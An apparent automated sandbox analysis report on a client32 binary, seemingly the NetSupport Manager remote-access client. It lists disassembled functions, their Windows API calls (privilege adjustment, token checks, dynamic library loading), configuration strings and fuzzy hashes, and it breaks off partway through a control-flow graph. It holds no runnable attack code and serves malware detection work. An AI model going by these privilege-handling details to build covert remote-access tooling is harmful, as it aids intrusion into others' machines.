                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000004.00000002.3006561141.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                • Associated: 00000004.00000002.3006544217.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006675365.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006715034.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006779357.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: CloseOpenQueryValueVersion__isdigit_l_strncpy
                                                                                                                                                                                • String ID: CSDVersion$CurrentMajorVersionNumber$CurrentMinorVersionNumber$CurrentVersion$SOFTWARE\Microsoft\Windows NT\CurrentVersion$Service Pack
                                                                                                                                                                                • API String ID: 1006059246-2117887902
                                                                                                                                                                                • Opcode ID: 47c1cf3054eeacd44abf8ff8beaa4a18b5b1a344074faa00b7f8cb91ac786f79
                                                                                                                                                                                • Instruction ID: 72e9b589e9c81c7730d33f5d85faf9c496c6ad46d8e7039c924549f2bc0033ac
                                                                                                                                                                                • Opcode Fuzzy Hash: 47c1cf3054eeacd44abf8ff8beaa4a18b5b1a344074faa00b7f8cb91ac786f79
                                                                                                                                                                                • Instruction Fuzzy Hash: A4510871E0023BABDB21CF61CD41FDEF7B9AB01B0CF1040A9E91D66945E7B16A49CB91
                                                                                                                                                                                Function 11116880 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 182librarycomloaderCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • CoInitialize.OLE32(00000000), ref: 111168D5
                                                                                                                                                                                • CoCreateInstance.OLE32(111C1AAC,00000000,00000001,111C1ABC,?), ref: 111168EF
                                                                                                                                                                                • LoadLibraryA.KERNEL32 ref: 11116914
                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,SHGetSettings), ref: 11116926
                                                                                                                                                                                • SHGetSettings.SHELL32(?,00000200), ref: 11116939
                                                                                                                                                                                • FreeLibrary.KERNEL32(00000000), ref: 11116945
                                                                                                                                                                                • CoUninitialize.COMBASE ref: 111169E1
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000004.00000002.3006561141.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                • Associated: 00000004.00000002.3006544217.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006675365.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006715034.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006779357.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Library$AddressCreateFreeInitializeInstanceLoadProcSettingsUninitialize
                                                                                                                                                                                • String ID: SHELL32.DLL$SHGetSettings
                                                                                                                                                                                • API String ID: 4195908086-2348320231
                                                                                                                                                                                • Opcode ID: f89f9c71c60c8a54ed07ade511b80e6e978afb6c9661bcf82ac7bd9c3acce4da
                                                                                                                                                                                • Instruction ID: 86b6e15c13bd198e2be1b4906c6dc8e983a2f790f9ea6f3073e45f268e972f68
                                                                                                                                                                                • Opcode Fuzzy Hash: f89f9c71c60c8a54ed07ade511b80e6e978afb6c9661bcf82ac7bd9c3acce4da
                                                                                                                                                                                • Instruction Fuzzy Hash: 81515175A00219AFDB00DFA5C9C0EAFFBB9EF48304F114969E915AB244E771A941CB61
                                                                                                                                                                                Function 1109ED30 Relevance: 6.1, APIs: 4, Instructions: 86memoryCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • GetTokenInformation.KERNELBASE(00000000,00000001(TokenIntegrityLevel),00000000,00000000,?,11030346,?,00000000), ref: 1109ED68
                                                                                                                                                                                • GetTokenInformation.KERNELBASE(00000000,00000001(TokenIntegrityLevel),?,00000001,00000001), ref: 1109ED84
                                                                                                                                                                                • AllocateAndInitializeSid.ADVAPI32(?,00000001,00000012,00811480,00811480,00811480,00811480,00811480,00811480,00811480,111EFB64,?,00000001,00000001), ref: 1109EDB0
                                                                                                                                                                                • EqualSid.ADVAPI32(?,00811480,?,00000001,00000001), ref: 1109EDC3
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000004.00000002.3006561141.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                • Associated: 00000004.00000002.3006544217.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006675365.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006715034.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006779357.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: InformationToken$AllocateEqualInitialize
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 1878589025-0
                                                                                                                                                                                • Opcode ID: b50a20e1221eedc780e7fec89b063c9e4a51bcecb435cf0fd3c0d73ac9311097
                                                                                                                                                                                • Instruction ID: f2a8bc8f74b1de347afb3cb87d534257ea472b44b3b43d4353705adbfce15ac3
                                                                                                                                                                                • Opcode Fuzzy Hash: b50a20e1221eedc780e7fec89b063c9e4a51bcecb435cf0fd3c0d73ac9311097
                                                                                                                                                                                • Instruction Fuzzy Hash: DF213031B0122EABEB10DA98DD95BFEB7B8EB44704F014169E929DB180E671AD10D791
                                                                                                                                                                                Function 1109D860 Relevance: 6.0, APIs: 4, Instructions: 48COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • GetCurrentProcess.KERNEL32(000F01FF,?,11030703,00000000,00000000,00080000,2520CF5D,00080000,00000000,?), ref: 1109D88D
                                                                                                                                                                                • OpenProcessToken.ADVAPI32(00000000), ref: 1109D894
                                                                                                                                                                                • LookupPrivilegeValueA.ADVAPI32(00000000,00000000,?), ref: 1109D8A5
                                                                                                                                                                                • AdjustTokenPrivileges.KERNELBASE(00000000), ref: 1109D8C9
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000004.00000002.3006561141.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                • Associated: 00000004.00000002.3006544217.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006675365.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006715034.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006779357.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: ProcessToken$AdjustCurrentLookupOpenPrivilegePrivilegesValue
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2349140579-0
                                                                                                                                                                                • Opcode ID: 8121b617b157b22b90d43b6f9d94b2f12a58659ddc9bf757066e97102c04f392
                                                                                                                                                                                • Instruction ID: 81f12928af7d2c66371a758247fa27ee71cd04b85772abc6619dfc746b0a2552
                                                                                                                                                                                • Opcode Fuzzy Hash: 8121b617b157b22b90d43b6f9d94b2f12a58659ddc9bf757066e97102c04f392
                                                                                                                                                                                • Instruction Fuzzy Hash: 4F018CB2640218ABE710DFA4CD89BABF7BCEB04705F004429E91597280D7B06904CBB0
                                                                                                                                                                                Function 1103179F Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 29COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • SetUnhandledExceptionFilter.KERNEL32(1102EA50), ref: 110317A4
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000004.00000002.3006561141.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                • Associated: 00000004.00000002.3006544217.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006675365.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006715034.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006779357.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: ExceptionFilterUnhandled
                                                                                                                                                                                • String ID: NSMWClass$NSMWClass
                                                                                                                                                                                • API String ID: 3192549508-3370270075
                                                                                                                                                                                • Opcode ID: 96edf08b29b1696d8d10b9a1bf637de583a2b266841e97e87a8d1f7583a1b351
                                                                                                                                                                                • Instruction ID: 7b5d81f51e667940ad04294aa4921a9d398cd68620cae9b07092b7c4982c4065
                                                                                                                                                                                • Opcode Fuzzy Hash: 96edf08b29b1696d8d10b9a1bf637de583a2b266841e97e87a8d1f7583a1b351
                                                                                                                                                                                • Instruction Fuzzy Hash: 29F04978A0216ACFC30ADFE5959086ABBF0FB883083408579C43587308E7326500CF85
                                                                                                                                                                                Function 11073680 Relevance: 4.1, Strings: 3, Instructions: 314COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000004.00000002.3006561141.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                • Associated: 00000004.00000002.3006544217.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006675365.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006715034.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006779357.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: NBCTL32.DLL$_License$serial_no
                                                                                                                                                                                • API String ID: 0-35127696
                                                                                                                                                                                • Opcode ID: 4a87d1ba2399e1056b9a8d7115d311808a964c43a3d1f9be638d510fcede8999
                                                                                                                                                                                • Instruction ID: b632ae2d06a9e035363f4f75e6ccaf6c516ded967162c2d69bbdd490d26a7599
                                                                                                                                                                                • Opcode Fuzzy Hash: 4a87d1ba2399e1056b9a8d7115d311808a964c43a3d1f9be638d510fcede8999
                                                                                                                                                                                • Instruction Fuzzy Hash: A8B18075E04209ABE714CF98DC81FEEB7F5FF88304F158169E9499B285DB71A901CB90
                                                                                                                                                                                Function 1109D8F0 Relevance: 3.0, APIs: 2, Instructions: 21COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • AdjustTokenPrivileges.KERNELBASE(?,00000000,?,?,00000000,00000000,00000000,1109EC30,00000244,cant create events), ref: 1109D90C
                                                                                                                                                                                • CloseHandle.KERNEL32(?,00000000,1109EC30,00000244,cant create events), ref: 1109D915
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000004.00000002.3006561141.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                • Associated: 00000004.00000002.3006544217.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006675365.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006715034.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006779357.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: AdjustCloseHandlePrivilegesToken
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 81990902-0
                                                                                                                                                                                • Opcode ID: 7d88282d2466d0bea445bfa4253874e9d1aaaebadf3be96b3f697e0eef8d2738
                                                                                                                                                                                • Instruction ID: 1087c1a68057020919897756081cb42e4a012b8ce4d03b8cf520615490e2fd10
                                                                                                                                                                                • Opcode Fuzzy Hash: 7d88282d2466d0bea445bfa4253874e9d1aaaebadf3be96b3f697e0eef8d2738
                                                                                                                                                                                • Instruction Fuzzy Hash: 3CE08C30280214ABE338DE24AD90FA673EDAF05B04F11092DF8A6D2580CA60E8008B60
                                                                                                                                                                                Function 1102EC2C Relevance: 220.3, APIs: 32, Strings: 93, Instructions: 1597COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • GetSystemMetrics.USER32(00002000), ref: 1102ED54
                                                                                                                                                                                • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 1102ED86
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000004.00000002.3006561141.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                • Associated: 00000004.00000002.3006544217.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006675365.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006715034.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006779357.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: CreateEventMetricsSystem
                                                                                                                                                                                • String ID: *BeepSound$*BeepUsingSpeaker$*ListenPort$*PriorityClass$*ScreenScrape$*StartupDelay$301389$AlwaysOnTop$AssertTimeout$Audio$Bridge$CLIENT32.CPP$Client$Default$DisableAudio$DisableAudioFilter$DisableConsoleClient$DisableHelp$DisableJoinClass$DisableJournal$DisableJournalMenu$DisableReplayMenu$DisableRequestHelp$DisableRunplugin$DisableTSAdmin$EnableGradientCaptions$EnableSmartcardAuth$EnableSmartcardLogon$Error x%x reading nsm.lic, sesh=%d$Error. Could not load transports - perhaps another client is running$Error. Wrong hardware. Terminating$General$Global\NSMWClassAdmin$Info. Client already running, pid=%d (x%x)$Info. Client running as user=%s, type=%d$Info. Trying to close client$Intel error "%s"$Intel(r)$IsILS returned %d, isvistaservice %d$IsJPIK returned %d, isvistaservice %d$JPK$LSPloaded=%d, WFPloaded=%d$MiniDumpType$NSA.LIC$NSM.LIC$NSMWClass$NSMWClassVista$NSMWControl32$NSSWControl32$NSTWControl32$NeedsReinstall$NoFTWhenLoggedOff$RWh$Ready$RestartAfterError$ScreenScrape$Session shutting down, exiting...$ShowKBEnable$TCPIP$TraceIPC$TracePriv$UseIPC$UseLegacyPrintCapture$UseNTSecurity$V12.00.20$V12.10.20$View$WPh$WRh$WRh$Windows 95$Windows Ding.wav$Windows XP Ding.wav$_debug$_debug$client32$closed ok$gClient.hNotifyEvent$h0u$hClientRunning = %x, pid=%d (x%x)$istaService$istaUI$jj$jj$jjjj$jj$pcicl32$t&h$tGj$u.j$win8ui$|#j$#
                                                                                                                                                                                • API String ID: 1866202007-2611433750
                                                                                                                                                                                • Opcode ID: 01d26aeaa090bfed43cc4473cd8bd8e1019c4e90e5378fdeb1c2f78422c22539
                                                                                                                                                                                • Instruction ID: e8e612f7774658af9dea4f707272508971b19954e7815057b76c4fc7be237560
                                                                                                                                                                                • Opcode Fuzzy Hash: 01d26aeaa090bfed43cc4473cd8bd8e1019c4e90e5378fdeb1c2f78422c22539
                                                                                                                                                                                • Instruction Fuzzy Hash: EDC23A78F42266ABF711CBE0CC85FAEF6A56B4470CF5004A8F6157B2C8DBB1A940C756
                                                                                                                                                                                Function 1102E0D0 Relevance: 81.1, APIs: 15, Strings: 31, Instructions: 630COMMON
                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 1079 1102e0d0-1102e120 call 111101b0 1082 1102e122-1102e136 call 11143630 1079->1082 1083 1102e138 1079->1083 1084 1102e13e-1102e183 call 11142e60 call 11143690 1082->1084 1083->1084 1091 1102e323-1102e332 call 11145990 1084->1091 1092 1102e189 1084->1092 1101 1102e338-1102e348 1091->1101 1093 1102e190-1102e193 1092->1093 1095 1102e195-1102e197 1093->1095 1096 1102e1b8-1102e1c1 1093->1096 1098 1102e1a0-1102e1b1 1095->1098 1099 1102e1c7-1102e1ce 1096->1099 1100 1102e2f4-1102e30d call 11143690 1096->1100 1098->1098 1102 1102e1b3 1098->1102 1099->1100 1104 1102e2c3-1102e2d8 call 11163ca7 1099->1104 1105 1102e1d5-1102e1d7 1099->1105 1106 1102e2da-1102e2ef call 11163ca7 1099->1106 1107 1102e26a-1102e29d call 11162777 call 11142e60 1099->1107 1108 1102e2ab-1102e2c1 call 11164ed0 1099->1108 1109 1102e25b-1102e265 1099->1109 1110 1102e29f-1102e2a9 1099->1110 1111 1102e21c-1102e222 1099->1111 1112 1102e24c-1102e256 1099->1112 1100->1093 1127 1102e313-1102e315 1100->1127 1113 1102e34a 1101->1113 1114 1102e34f-1102e363 call 1102d360 1101->1114 1102->1100 1104->1100 1105->1100 1123 1102e1dd-1102e217 call 11162777 call 11142e60 call 1102d360 1105->1123 1106->1100 1107->1100 1108->1100 1109->1100 1110->1100 1115 1102e224-1102e238 call 11163ca7 1111->1115 1116 1102e23d-1102e247 1111->1116 1112->1100 1113->1114 1124 1102e368-1102e36d 1114->1124 1115->1100 1116->1100 1123->1100 1133 1102e413-1102e42d call 11146fe0 1124->1133 1136 1102e373-1102e398 call 110b7df0 call 11147060 1124->1136 1127->1133 1134 1102e31b-1102e321 1127->1134 1148 1102e483-1102e48f call 1102bc40 1133->1148 1149 1102e42f-1102e448 call 1105e820 1133->1149 1134->1091 1134->1101 1154 1102e3a3-1102e3a9 1136->1154 1155 1102e39a-1102e3a1 1136->1155 1158 1102e491-1102e498 1148->1158 1159 1102e468-1102e46f 1148->1159 1149->1148 1162 1102e44a-1102e45c 1149->1162 1160 1102e3ab-1102e3b2 call 11028360 1154->1160 1161 1102e409 1154->1161 1155->1133 1163 1102e475-1102e478 1158->1163 1165 1102e49a-1102e4a4 1158->1165 1159->1163 1164 1102e67a-1102e69b GetComputerNameA 1159->1164 1160->1161 1178 1102e3b4-1102e3e6 1160->1178 1161->1133 1162->1148 1173 1102e45e 1162->1173 1167 1102e47a-1102e481 call 110b7df0 1163->1167 1168 1102e4a9 1163->1168 1169 1102e6d3-1102e6d9 1164->1169 1170 1102e69d-1102e6d1 call 11028230 1164->1170 1165->1164 1175 1102e4ac-1102e586 call 11027f40 call 110281e0 call 11027f40 * 2 LoadLibraryA GetProcAddress 1167->1175 1168->1175 1176 1102e6db-1102e6e0 1169->1176 1177 1102e70f-1102e722 call 11164ed0 1169->1177 1170->1169 1201 1102e727-1102e733 1170->1201 1173->1159 1230 1102e64a-1102e652 SetLastError 1175->1230 1231 1102e58c-1102e5a3 1175->1231 1182 1102e6e6-1102e6ea 1176->1182 1196 1102e917-1102e93a 1177->1196 1194 1102e3f0-1102e3ff call 110f64d0 1178->1194 1195 1102e3e8-1102e3ee 1178->1195 1188 1102e706-1102e708 1182->1188 1189 1102e6ec-1102e6ee 1182->1189 1197 1102e70b-1102e70d 1188->1197 1192 1102e702-1102e704 1189->1192 1193 1102e6f0-1102e6f6 1189->1193 1192->1197 1193->1188 1198 1102e6f8-1102e700 1193->1198 1199 1102e402-1102e404 call 1102d900 1194->1199 1195->1194 1195->1199 1210 1102e962-1102e96a 